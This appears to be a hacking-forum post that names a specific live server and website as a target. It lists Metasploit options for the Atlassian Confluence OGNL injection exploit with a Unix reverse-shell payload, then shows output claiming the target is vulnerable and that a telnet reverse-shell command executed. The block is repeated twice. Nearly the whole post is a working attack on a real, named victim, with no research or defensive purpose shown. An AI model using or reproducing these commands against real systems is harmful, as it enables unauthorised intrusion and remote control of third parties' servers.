OP 13 April, 2022 - 12:29 AM
(This post was last modified: 13 April, 2022 - 12:47 AM by SherlockHemredge. Edited 4 times in total.)
Vuln Target: https://95.80.77.139:8444/login.action?o...ation=true
Site: https://iterya.com/
msf options:
use exploit/multi/http/atlassian_confluence_webwork_ognl_injection
setg ForceExploit true
setg VERBOSE true
set payload payload/cmd/unix/reverse
set RHOSTS 95.80.77.139
set RPORT 8444
msf poc:
[+] sh -c '(sleep 3715|telnet 0.0.0.0 5000|while : ; do sh && break; done 2>&1|telnet 0.0.0.0 5000 >/dev/null 2>&1 &)'
Started reverse TCP double handler on 0.0.0.0:5000
Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Successfully tested OGNL injection.
Executing cmd/unix/reverse (Unix Command)
[+] Successfully executed command: sh -c '(sleep 3921|telnet 0.0.0.0 5000|while : ; do sh && break; done 2>&1|telnet 0.0.0.0 5000 >/dev/null 2>&1 &)'
Site: https://iterya.com/
msf options:
use exploit/multi/http/atlassian_confluence_webwork_ognl_injection
setg ForceExploit true
setg VERBOSE true
set payload payload/cmd/unix/reverse
set RHOSTS 95.80.77.139
set RPORT 8444
msf poc:
[+] sh -c '(sleep 3715|telnet 0.0.0.0 5000|while : ; do sh && break; done 2>&1|telnet 0.0.0.0 5000 >/dev/null 2>&1 &)'
Started reverse TCP double handler on 0.0.0.0:5000
Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Successfully tested OGNL injection.
Executing cmd/unix/reverse (Unix Command)
[+] Successfully executed command: sh -c '(sleep 3921|telnet 0.0.0.0 5000|while : ; do sh && break; done 2>&1|telnet 0.0.0.0 5000 >/dev/null 2>&1 &)'